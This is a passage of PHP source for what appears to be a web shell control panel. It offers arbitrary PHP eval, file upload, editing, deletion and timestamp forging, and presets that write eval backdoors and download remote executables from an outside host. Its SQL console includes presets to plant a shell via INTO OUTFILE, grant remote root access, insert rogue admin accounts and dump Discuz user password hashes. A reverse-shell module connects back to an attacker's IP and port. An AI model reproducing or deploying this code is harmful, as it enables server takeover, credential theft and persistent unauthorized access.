\'/Load\\\\s*\\\\((.*)Request/i\', \'/StreamWriter\\\\(Server\\\\.MapPath(.*)\\\\.Write\\\\(Request/i\'), \'jsp\' => array(\'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/Runtime\\\\.getRuntime\\\\(\\\\)\\\\.exec\\\\((.*)\\\\)/i\', \'/FileOutputStream\\\\(application\\\\.getRealPath(.*)request/i\'));\n flush();\n ob_flush();\n echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n $isread = antivirus(strdir($scandir . \'/\'), $typearr, $matches, $nowdir);\n echo \'<p>\' . ($isread ? \'<h2>Scan complete</h2>\' : \'<h1>Scan failed</h1>\') . \'</p></div>\';\n }\n break;\n case "phpeval":\n if (isset($_POST[\'phpcode\'])) {\n $phpcode = chop($_POST[\'phpcode\']);\n ob_start();\n if (substr($phpcode, 0, 2) == \'<?\' && substr($phpcode, -2) == \'?>\') {\n @eval(\'?>\' . $phpcode . \'<?php \');\n } else {\n @eval($phpcode);\n }\n $out = ob_get_contents();\n ob_end_clean();\n } else {\n $phpcode = \'phpinfo();\';\n $out = \'Result Program\';\n }\n echo base64_decode(\'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="phpeval">\';\n echo \'<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">\' . htmlspecialchars($phpcode) . \'</textarea></p><p>\';\n echo \'<select onchange="$(\\\'phpcode\\\').value=options[selectedIndex].value">\';\n echo \'<option>---Common Code---</option>\';\n echo \'<option value="echo readfile(\\\'C:/web/haxor.php\\\');">Read file</option>\';\n echo \'<option value="$fp=fopen(\\\'C:/web/haxor.php\\\',\\\'w\\\');echo fputs($fp,\\\'<?php eval($_POST[cmd]);?>\\\')?\\\'Success!\\\':\\\'Fail!\\\';fclose($fp);">Write file</option>\';\n echo \'<option value="echo copy(\\\'C:/web/mi77i.php\\\',\\\'C:/web/haxor.php\\\')?\\\'Success!\\\':\\\'Fail!\\\';">Copy files</option>\';\n echo \'<option value="echo chmod(\\\'C:/web/mi77i.php\\\',0777)?\\\'Success!\\\':\\\'Fail!\\\';">Modify properties</option>\';\n echo \'<option value="echo file_put_contents(\\\'\' . THISDIR . \'cmd.exe\\\', file_get_contents(\\\'http://hax.or.id/indo.txt\\\'))?\\\'Success!\\\':\\\'Fail!\\\';">Remote download</option>\';\n echo \'<option value="print_r($_SERVER);">Environment variable</option>\';\n echo \'</select> \';\n echo \'<input type="submit" style="width:80px;" value="Go"></p></div>\';\n echo \'</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">\' . htmlspecialchars($out) . \'</textarea></p><p><input type="button" value="Run in HTML" onclick="runcode(\\\'evalcode\\\')"></p></div>\';\n break;\n case "sql":\n if (!empty($_POST[\'sqlhost\']) && !empty($_POST[\'sqluser\']) && !empty($_POST[\'names\'])) {\n $type = $_POST[\'type\'];\n $sqlhost = $_POST[\'sqlhost\'];\n $sqluser = $_POST[\'sqluser\'];\n $sqlpass = $_POST[\'sqlpass\'];\n $sqlname = $_POST[\'sqlname\'];\n $sqlcode = $_POST[\'sqlcode\'];\n $names = $_POST[\'names\'];\n switch ($type) {\n case "PostgreSql":\n if (function_exists(\'pg_close\')) {\n if (strstr($sqlhost, \':\')) {\n $array = explode(\':\', $sqlhost);\n $sqlhost = $array[0];\n $sqlport = $array[1];\n } else {\n $sqlport = 5432;\n }\n $dbconn = @pg_connect("host={$sqlhost} port={$sqlport} dbname={$sqlname} user={$sqluser} password={$sqlpass}");\n if ($dbconn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n pg_query(\'set client_encoding=\' . $names);\n $result = pg_query($sqlcode);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = pg_fetch_array($result)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'error\' => pg_result_error($result));\n }\n pg_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @pg_close($dbconn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "MsSql":\n if (function_exists(\'mssql_close\')) {\n $dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);\n if ($dbconn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n mssql_select_db($sqlname, $dbconn);\n $result = mssql_query($sqlcode);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = mssql_fetch_array($result)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n }\n @mssql_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @mssql_close($dbconn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "Oracle":\n if (function_exists(\'oci_close\')) {\n $conn = @oci_connect($sqluser, $sqlpass, $sqlhost . \'/\' . $sqlname);\n if ($conn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n $stid = oci_parse($conn, $sqlcode);\n oci_execute($stid);\n if ($stid) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = oci_fetch_array($stid, OCI_ASSOC)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $e = oci_error();\n $rows = array(\'error\' => $e[\'message\']);\n }\n oci_free_statement($stid);\n } else {\n $e = oci_error();\n $rows = array(\'error\' => $e[\'message\']);\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @oci_close($conn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "MySql":\n if (function_exists(\'mysql_close\')) {\n $conn = mysql_connect(strstr($sqlhost, \':\') ? $sqlhost : $sqlhost . \':3306\', $sqluser, $sqlpass, $sqlname);\n if ($conn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n if (substr($sqlcode, 0, 7) == \'t00lsa\') {\n $array = array();\n $data = \'\';\n $i = 0;\n preg_match_all(\'/t00lsa\\\\s*\\\'(.*)\\\'\\\\s*t00lsb\\\\s*\\\'(.*)\\\'\\\\s*t00lsc\\\\s*\\\'(.*)\\\'\\\\s*t00lsfile\\\\s*\\\'(.*)\\\'/i\', $sqlcode, $array);\n if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {\n mysql_select_db($array[1][0], $conn);\n mysql_query(\'set names \' . $names, $conn);\n $spidercode = \'select \' . $array[3][0] . \' from `\' . $array[2][0] . \'`;\';\n $result = mysql_query($spidercode, $conn);\n if ($result) {\n while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {\n $data .= join(\' |x| \', $row) . "\\r\\n";\n $i++;\n }\n if ($data) {\n $file = strdir($array[4][0]);\n $msg .= filew($file, $data, \'w\') ? \'<h2> - Successfully off the DB</h2>\' : \'<h1> - Failed to export file</h1>\';\n $rows = array(\'file\' => $file, size(filesize($file)) => \'Total acquisition\' . $i . \'Article data\');\n } else {\n $msg .= \'<h1> - No data</h1>\';\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n } else {\n $msg .= \'<h1> - Off-database statement error</h1>\';\n }\n } elseif (!empty($sqlcode)) {\n mysql_select_db($sqlname, $conn);\n mysql_query(\'set names \' . $names, $conn);\n $result = mysql_query($sqlcode, $conn);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n }\n mysql_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n mysql_close($conn);\n } else {\n $msg = \'<h1>Not Support\' . $type . \'</h1>\';\n }\n break;\n }\n } else {\n $type = \'MySql\';\n $sqlhost = \'localhost:3306\';\n $sqluser = \'root\';\n $sqlpass = \'123456\';\n $sqlname = \'mysql\';\n $sqlcode = \'select version();\';\n $names = \'gbk\';\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="sql">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Support type</td><td>\';\n $dbs = array(\'MySql\', \'MsSql\', \'Oracle\', \'PostgreSql\');\n foreach ($dbs as $dbname) {\n echo \'<label><input type="radio" name="type" value="\' . $dbname . \'"\' . ($type == $dbname ? \' checked\' : \'\') . \'>\' . $dbname . \'</label> \';\n }\n echo \'</td></tr><tr><td>Connection</td><td>Address <input type="text" name="sqlhost" style="width:188px;" value="\' . $sqlhost . \'"> \';\n echo \'User <input type="text" name="sqluser" style="width:108px;" value="\' . $sqluser . \'"> \';\n echo \'Password <input type="text" name="sqlpass" style="width:108px;" value="\' . $sqlpass . \'"> \';\n echo \'DB Name <input type="text" name="sqlname" style="width:108px;" value="\' . $sqlname . \'"></td></tr>\';\n echo \'<tr><td>Statement<br>\';\n echo \'<select onchange="$(\\\'sqlcode\\\').value=options[selectedIndex].value">\';\n echo \'<option value="select version();">---Statement set---</option>\';\n echo \'<option value="select \\\'<?php eval ($_POST[cmd]);?>\\\' into outfile \\\'D:/web/shell.php\\\';">Write file</option>\';\n echo \'<option value="GRANT ALL PRIVILEGES ON *.* TO \\\'\' . $sqluser . \'\\\'@\\\'%\\\' IDENTIFIED BY \\\'\' . $sqlpass . \'\\\' WITH GRANT OPTION;">Open external connection</option>\';\n echo \'<option value="show variables;">System variable</option>\';\n echo \'<option value="create database haxor;">Create database</option>\';\n echo \'<option value="create table `haxor` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">Create data table</option>\';\n echo \'<option value="show databases;">Show database</option>\';\n echo \'<option value="show tables from `\' . $sqlname . \'`;">Show data sheet</option>\';\n echo \'<option value="show columns from `haxor`;">Show table structure</option>\';\n echo \'<option value="drop table `haxor`;">Delete data table</option>\';\n echo \'<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">Display field</option>\';\n echo \'<option value="insert into `admin` (`user`,`pass`) values (\\\'haxor\\\', \\\'f1a81d782dea6a19bdca383bffe68452\\\');">Insert data</option>\';\n echo \'<option value="update `admin` set `user` = \\\'mi77i\\\',`pass` = \\\'50de237e389600acadbeda3d6e6e0b1f\\\' where `user` = \\\'haxor\\\' and `pass` = \\\'f1a81d782dea6a19bdca383bffe68452\\\' limit 1;">Change data</option>\';\n echo \'<option value="t00lsa \\\'discuzx25\\\' t00lsb \\\'pre_ucenter_members\\\' t00lsc \\\'username,password,salt,email\\\' t00lsfile \\\'\' . THISDIR . \'out.txt\\\';">Off the DB (MySql)</option>\';\n echo \'</select>\';\n echo \'</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">\' . htmlspecialchars($sqlcode) . \'</textarea></td></tr>\';\n echo \'<tr><td>Action</td><td><select name="names">\';\n $charsets = array(\'gbk\', \'utf8\', \'big5\', \'latin1\', \'cp866\', \'ujis\', \'euckr\', \'koi8r\', \'koi8u\');\n foreach ($charsets as $charset) {\n echo \'<option value="\' . $charset . \'"\' . ($names == $charset ? \' selected\' : \'\') . \'>\' . $charset . \'</option>\';\n }\n echo \'</select> <input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if ($rows) {\n echo \'<pre style="padding:5px;background:#F8F8F8;text-align:left;">\';\n ob_start();\n print_r($rows);\n $out = ob_get_contents();\n ob_end_clean();\n if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $out) && function_exists(\'iconv\')) {\n $out = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $out);\n }\n echo htmlspecialchars($out);\n echo \'</pre>\';\n }\n break;\n case "backshell":\n if (!empty($_POST[\'backip\']) && !empty($_POST[\'backport\'])) {\n $backip = $_POST[\'backip\'];\n $backport = $_POST[\'backport\'];\n $temp = $_POST[\'temp\'] ? $_POST[\'temp\'] : \'/tmp\';\n $type = $_POST[\'type\'];\n $msg = backshell($backip, $backport, $temp, $type);\n } else {\n $backip = $_SERVER[\'REMOTE_ADDR\'];\n $backport = \'443\';\n $temp = \'/tmp\';\n $type = \'pl\';\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="backshell">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Bind address</td><td><input type="text" name="backip" style="width:268px;" value="\' . $backip . \'"> (Your ip)</td></tr>\';\n echo \'<tr><td>Bind port</td><td><input type="text" name="backport" style="width:268px;" value="\' . $backport . \'"> (nc -vvlp \' . $backport . \')</td></tr>\';\n echo \'<tr><td>Temporary directory</td><td><input type="text" name="temp" style="width:268px;" value="\' . $temp . \'"> (Only Linux)</td></tr>\';\n echo \'<tr><td>Rebound method</td><td>\';\n $types = array(\'pl\' => \'Perl\', \'py\' => \'Python\', \'c\' => \'C-bin\', \'pcntl\' => \'Pcntl\', \'php\' => \'PHP\', \'phpwin\' => \'PHP-WS\');\n foreach ($types as $key => $name) {\n echo \'<label><input type="radio" name="type" value="\' . $key . \'"\' . ($key == $type ? \' checked\' : \'\') . \'>\' . $name . \'</label> \';\n }\n echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n break;\n case "edit":\n case "editor":\n $file = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n $iconv = function_exists(\'iconv\');\n if (!file_exists($file)) {\n $msg = \'[Create new file]\';\n } else {\n $code = filer($file);\n $chst = \'Default\';\n if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $code) && $iconv) {\n $chst = \'utf-8\';\n $code = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $code);\n }\n $size = size(filesize($file));\n $msg = \'[File Permission: \' . substr(decoct(fileperms($file)), -4) . \'] [File size: \' . $size . \'] [File encoding: \' . $chst . \']\';\n }\n echo base64_decode(\'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==\');\n echo \'<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="Find content" onclick="search($(\\\'keyword\\\').value);"> - \' . $msg . \'</div>\';\n echo \'<form name="editfrm" id="editfrm" method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">\';\n echo \'<input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n echo \'<div class="actall">File <input type="text" name="filename" value="\' . $file . \'" style="width:528px;"> \';\n if ($iconv) {\n echo \'Coding <select name="tostr">\';\n $selects = array(\'normal\' => \'Default\', \'utf\' => \'utf-8\');\n foreach ($selects as $var => $name) {\n echo \'<option value="\' . $var . \'"\' . ($name == $chst ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n }\n echo \'</select>\';\n }\n echo \'</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">\' . htmlspecialchars($code) . \'</textarea></div></form>\';\n echo \'<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\\\'editfrm\\\').submit();" value="Save" style="width:80px;"> \';\n echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n subeval();\n echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n break;\n case "upfiles":\n $updir = isset($_POST[\'updir\']) ? $_POST[\'updir\'] : $_POST[\'godir\'];\n $msg = \'[Maximum upload file \' . get_cfg_var("upload_max_filesize") . \'] [POST maximum submitted data \' . get_cfg_var("post_max_size") . \']\';\n $max = 10;\n if (isset($_FILES[\'uploads\']) && isset($_POST[\'renames\'])) {\n $uploads = $_FILES[\'uploads\'];\n $msgs = array();\n for ($i = 1; $i < $max; $i++) {\n if ($uploads[\'error\'][$i] == UPLOAD_ERR_OK) {\n $rename = $_POST[\'renames\'][$i] == \'\' ? $uploads[\'name\'][$i] : $_POST[\'renames\'][$i];\n $filea = $uploads[\'tmp_name\'][$i];\n $fileb = strdir($updir . \'/\' . $rename);\n $msgs[$i] = fileu($filea, $fileb) ? \'<br><h2>Uploaded successfully \' . $rename . \'</h2>\' : \'<br><h1>Upload failed \' . $rename . \'</h1>\';\n }\n }\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">\';\n subeval();\n echo \'<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">\';\n echo \'<div class="actall"><p>Upload to directory <input type="text" name="updir" style="width:398px;" value="\' . $updir . \'"></p>\';\n for ($i = 1; $i < $max; $i++) {\n echo \'<p>File\' . $i . \' <input type="file" name="uploads[\' . $i . \']" style="width:300px;"> Rename <input type="text" name="renames[\' . $i . \']" style="width:128px;"> \' . $msgs[$i] . \'</p>\';\n }\n echo \'</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\\\'upsfrm\\\').submit();" value="Upload" style="width:80px;"> \';\n echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . $updir . \'">\';\n subeval();\n echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n break;\n default:\n if (isset($_FILES[\'upfile\'])) {\n if ($_FILES[\'upfile\'][\'name\'] == \'\') {\n $msg = \'<h1>Please select file</h1>\';\n } else {\n $rename = $_POST[\'rename\'] == \'\' ? $_FILES[\'upfile\'][\'name\'] : $_POST[\'rename\'];\n $filea = $_FILES[\'upfile\'][\'tmp_name\'];\n $fileb = strdir($nowdir . $rename);\n $msg = fileu($filea, $fileb) ? \'<h2>Upload files \' . $rename . \' Success</h2>\' : \'<h1>Upload files \' . $rename . \' Failure</h1>\';\n }\n }\n if (isset($_POST[\'act\'])) {\n switch ($_POST[\'act\']) {\n case "a":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @copy(strdir($nowdir . $filename), strdir($_POST[\'var\'] . \'/\' . $filename)) ? 1 : 0;\n }\n $msg = $msg = $i ? \'<h2>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "b":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Altogether deleted! \' . $i . \' Files succeeded</h2>\' : \'<h1>Altogether deleted! \' . $i . \' Files failed</h1>\';\n }\n break;\n case "c":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } elseif (!ereg("^[0-7]{4}\\$", $_POST[\'var\'])) {\n $msg = \'<h1>Permision value error</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @chmod(strdir($nowdir . $filename), base_convert($_POST[\'var\'], 8, 10)) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "d":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } elseif (!preg_match(\'/(\\\\d+)-(\\\\d+)-(\\\\d+) (\\\\d+):(\\\\d+):(\\\\d+)/\', $_POST[\'var\'])) {\n $msg = \'<h1>Wrong time format \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @touch(strdir($nowdir . $filename), strtotime($_POST[\'var\'])) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "e":\n $path = strdir($nowdir . $_POST[\'var\'] . \'/\');\n if (file_exists($path)) {\n $msg = \'<h1>Directory already exists \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $msg = @mkdir($path, 0777) ? \'<h2>Create a directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Create a directory \' . $_POST[\'var\'] . \' Failure</h1>\';\n }\n break;\n case "f":\n $context = array(\'http\' => array(\'timeout\' => 30));\n if (function_exists(\'stream_context_create\')) {\n $stream = stream_context_create($context);\n }\n $data = @file_get_contents($_POST[\'var\'], false, $stream);\n $filename = array_pop(explode(\'/\', $_POST[\'var\']));\n if ($data) {\n $msg = filew(strdir($nowdir . $filename), $data, \'wb\') ? \'<h2>Download \' . $filename . \' Success</h2>\' : \'<h1>Download \' . $filename . \' Failure</h1>\';\n } else {\n $msg = \'<h1>Download failed or download is not supported</h1>\';\n }\n break;\n case "rf":\n $files = explode(\'|x|\', $_POST[\'var\']);\n if (count($files) != 2) {\n $msg = \'<h1>Input error</h1>\';\n } else {\n $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? \'<h2>Rename \' . $files[1] . \' for \' . $files[0] . \' Success</h2>\' : \'<h1>Rename \' . $files[1] . \' for \' . $files[0] . \' Failure</h1>\';\n }\n break;\n case "pd":\n $files = explode(\'|x|\', $_POST[\'var\']);\n if (count($files) != 2) {\n $msg = \'<h1>Input error</h1>\';\n } else {\n $path = strdir($nowdir . $files[1]);\n $msg = @chmod($path, base_convert($files[0], 8, 10)) ? \'<h2>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Success</h2>\' : \'<h1>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Failure</h1>\';\n }\n break;\n case "edit":\n if (isset($_POST[\'filename\']) && isset($_POST[\'filecode\'])) {\n if ($_POST[\'tostr\'] == \'utf\') {\n $_POST[\'filecode\'] = @iconv(\'GB2312//IGNORE\', \'UTF-8\', $_POST[\'filecode\']);\n }\n $msg = filew($_POST[\'filename\'], $_POST[\'filecode\'], \'w\') ? \'<h2>Saved successfully \' . $_POST[\'filename\'] . \'</h2>\' : \'<h1>Save failed \' . $_POST[\'filename\'] . \'</h1>\';\n }\n break;\n case "deltree":\n $deldir = strdir($nowdir . $_POST[\'var\'] . \'/\');\n if (!file_exists($deldir)) {\n $msg = \'<h1>Total dir \' . $_POST[\'var\'] . \' does not exist</h1>\';\n } else {\n $msg = deltree($deldir) ? \'<h2>Delete directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Delete directory \' . $_POST[\'var\'] . \' failure</h1>\';\n }\n break;\n }\n }\n $chmod = substr(decoct(fileperms($nowdir)), -4);\n if (!$chmod) {\n $msg .= \' - <h1>Cannot read directory</h1>\';\n }\n $array = showdir($nowdir);\n $thisurl = strdir(\'/\' . strtr($nowdir, array(ROOTDIR => \'\')) . \'/\');\n $nowdir = strtr($nowdir, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<div class="actall"><form name="frm" id="frm" method="POST">\';\n subeval();\n echo (is_writable($nowdir) ? \'<h2>Path</h2>\' : \'<h1>Path</h1>\') . \' <input type="text" name="dir" id="dir" style="width:508px;" value="\' . strdir($nowdir . \'/\') . \'"> \';\n echo \'<input type="button" onclick="$(\\\'frm\\\').submit();" style="width:50px;" value="Go"> \';\n echo \'<input type="button" onclick="cd(\\\'\' . ROOTDIR . \'\\\');" style="width:68px;" value="Root dir"> \';\n echo \'<input type="button" onclick="cd(\\\'\' . THISDIR . \'\\\');" style="width:68px;" value="Current dir"> \';\n echo \'<select onchange="cd(options[selectedIndex].value);">\';\n echo \'<option>---Special Dir---</option>\';\n echo \'<option value="C:/RECYCLER/">Win-RECYCLER</option>\';\n echo \'<option value="C:/$Recycle.Bin/">Win-$Recycle</option>\';\n echo \'<option value="C:/Program Files/">Win-Program</option>\';\n echo \'<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>\';\n echo \'<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-Startup (CN)</option>\';\n echo \'<option value="C:/Windows/Temp/">Win-TEMP</option>\';\n echo \'<option value="/usr/local/">Linux-local</option>\';\n echo \'<option value="/tmp/">Linux-tmp</option>\';\n echo \'<option value="/var/tmp/">Linux-var</option>\';\n echo \'<option value="/etc/ssh/">Linux-ssh</option>\';\n echo \'</select></form></div><div class="actall">\';\n echo \'<input type="button" value="New file" onclick="nf(\\\'edit\\\',\\\'newfile.php\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="New Dir" onclick="txts(\\\'Directory name\\\',\\\'newdir\\\',\\\'e\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="Download" onclick="txts(\\\'Download the file to the current directory\\\',\\\'https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php\\\',\\\'f\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="Bulk Up" onclick="go(\\\'upfiles\\\',\\\'\' . $nowdir . \'\\\');" style="width:68px;"> \';\n echo \'<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">\';\n subeval();\n echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n echo \'<input type="file" name="upfile" style="width:286px;height:21px;"> \';\n echo \'<input type="button" onclick="$(\\\'upfrm\\\').submit();" value="Upload" style="width:50px;"> \';\n echo \'Renamed to <input type="text" name="rename" style="width:128px;">\';\n echo \'</form></div>\';\n echo \'<form name="frm1" id="frm1" method="POST"><table class="tables">\';\n subeval();\n echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n echo \'<input type="hidden" name="act" id="act" value="">\';\n echo \'<input type="hidden" name="var" id="var" value="">\';\n echo \'<th><a href="javascript:void(0);" onclick="cd(\\\'\' . dirname($nowdir) . \'/\\\');">Parent directory</a></th><th style="width:5%">Perm</th><th style="width:17%">Creation time</th><th style="width:17%">Last Changed</th><th style="width:8%">Size</th><th style="width:8%">Action</th>\';\n if ($array) {\n asort($array[\'dir\']);\n asort($array[\'file\']);\n $dnum = $fnum = 0;\n foreach ($array[\'dir\'] as $path => $name) {\n $prem = substr(decoct(fileperms($path)), -4);\n $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n echo \'<tr>\';\n echo \'<td><a href="javascript:void(0);" onclick="cd(\\\'\' . $nowdir . $name . \'\\\');"><b>\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</b></a></td>\';\n echo 